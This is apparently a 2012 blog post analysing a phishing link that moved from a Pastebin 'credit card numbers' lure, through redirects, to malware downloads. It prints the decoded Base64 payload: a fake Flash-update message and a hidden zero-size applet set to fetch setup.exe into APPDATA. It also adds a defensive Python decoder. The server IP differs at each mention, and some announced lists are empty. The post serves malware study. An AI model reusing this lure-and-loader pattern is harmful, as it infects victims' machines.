Journey of a Phishing Link
We come across so many links via social networking websites, and we unknowingly click many of them. Malicious links can have catastrophic results: the system is compromised, your privacy is violated, or your data takes the hit. Here is one such analysis of a link, dated 17 April 2012, that I came across via Twitter and LinkedIn.
NOTE: All links have been written with the non-clickable prefix "hxxp://" to prevent accidental clicks.
Someone posted this link (hxxp://pastebin.com/dRGHt7hy) in a tweet. On checking, it was a list of URLs (actually a single URL pasted multiple times, a sign of desperation), titled:
9954 credit card numbers
It claims the link leads to 9954 credit card numbers. The first hint that something is off: why not post the numbers directly rather than paste the same link four times in one entry?
Next, this is far too tempting a lure, so proceed with care. I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/), a malware hunting tool, with auto-redirect disabled. The link "hxxp://tinyurl.com/saw87hujnworeg" redirected to "hxxp://184.108.40.206/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b", which opened as a page of text fields and scripts. The page contained only one doubtful script, plus some headings and titles.
Here is the only important script contained within the page. Let’s do the analysis.
This script is hard to read because of its long variable names, so let's first shorten the variable names for better understanding. Here is the modified script with short variable names; its logic and behaviour are unchanged.
Now the logic of the script is easy to follow. First, let us decode the strings passed to setTimeout and document.write. They look Base64 encoded, so let's try to decode them. The encoded strings are,
Decoded strings are,
Adobe Flash must be updated to view this, please install the latest version!
<applet width="0px" height="0px" code="SiteLoader.class">
<param name="wcZPN" value="hxxp://220.127.116.11/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
<param name="v8TOX" value="setup.exe">
<param name="Legym" value="www.dogscast.com">
<param name="MpBDG" value="APPDATA">
</applet>
The first decoded string is there to entice the victim into installing the 'latest version' of Flash from the attackers' malicious link. The applet, in turn, will issue GET requests to the following links,
and its parameters are,
- name="wcZPN" value="hxxp://18.104.22.168/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
- name="v8TOX" value="setup.exe"
- name="Legym" value="www.dogscast.com"
- name="MpBDG" value="APPDATA"
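As an added example (not code from the original post), here is a small Python helper that automates the two steps above on a constructed, defanged sample: it finds Base64 literals in a script, decodes the ones that yield printable text, and pulls the applet class, its param pairs and any URLs out of the decoded HTML. The sample script, the variable name zq and the PLACEHOLDER-HOST address are assumptions.

```python
import base64
import binascii
import re

# Quoted literals long enough to be Base64, and the tags we expect once decoded.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
APPLET_CODE = re.compile(r'<applet[^>]*\bcode="([^"]+)"', re.I)
PARAM = re.compile(r'<param\s+name="([^"]+)"\s+value="([^"]+)"', re.I)

def decode_base64_literals(script):
    """Return every quoted literal in the script that is valid Base64 of printable text."""
    decoded = []
    for literal in B64_LITERAL.findall(script):
        try:
            raw = base64.b64decode(literal, validate=True)
        except binascii.Error:
            continue  # looks Base64-ish but is not (e.g. a long identifier)
        text = raw.decode("utf-8", errors="replace")
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            decoded.append(text)
    return decoded

def analyse(script):
    """Decode the hidden strings, then pull out the applet class, its params and URLs."""
    result = {"decoded": decode_base64_literals(script), "applet": None, "params": {}}
    for text in result["decoded"]:
        match = APPLET_CODE.search(text)
        if match:
            result["applet"] = match.group(1)
        result["params"].update(PARAM.findall(text))
    # Keep defanged (hxxp) and live (http) URLs alike so nothing is missed.
    result["urls"] = [v for v in result["params"].values()
                      if re.match(r"h(?:xx|tt)ps?://", v)]
    return result

# Constructed sample modelled on the page's findings: the host is a placeholder,
# not the real one, and the URL stays defanged.
LURE = "Adobe Flash must be updated to view this, please install the latest version!"
APPLET = ('<applet width="0px" height="0px" code="SiteLoader.class">'
          '<param name="wcZPN" value="hxxp://PLACEHOLDER-HOST/jdb/lib/load.php'
          '?id=0b740ebcc2abbc5512c4875a0f74965b">'
          '<param name="v8TOX" value="setup.exe">'
          '<param name="Legym" value="www.dogscast.com">'
          '<param name="MpBDG" value="APPDATA"></applet>')
LURE_B64, APPLET_B64 = (base64.b64encode(s.encode()).decode() for s in (LURE, APPLET))
SAMPLE_SCRIPT = ('var zq = "%s";\n'
                 'setTimeout(function () { document.write(zq); }, 500);\n'
                 'document.write(atob("%s"));' % (LURE_B64, APPLET_B64))
```

Calling analyse(SAMPLE_SCRIPT) returns the lure text, the applet class name and the four param pairs, with the load.php URL listed separately under "urls".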
Let us now access these URLs.
First, I accessed the adobe.php URL (hxxp://22.214.171.124/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla, and it downloaded a file "Adobe-Flash_WIN.exe" to my system. The file is approximately 1.16 MB. When scanned via VirusTotal it was detected by only 2 of 42 anti-malware products. Now, this is scary. I didn't get a chance to do the runtime analysis of this file, but I will post it in the next blog.
On accessing the second URL (hxxp://126.96.36.199/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar), it downloads a JAR file "0b740ebcc2abbc5512c4875a0f74965b.jar". Extracting it yields a "META-INF" directory and a "SiteLoader.class" file. The contents of META-INF include,
Now let's analyse the third URL, load.php (hxxp://188.8.131.52/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b), via Malzilla. When accessed, this link downloads a "setup.exe" file onto the host. This file is the same as the previous file, as its SHA-256 hash "cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5" confirms.
This is a brief analysis of a phishing link that started on Twitter as a Pastebin link and made its way to your system through various files.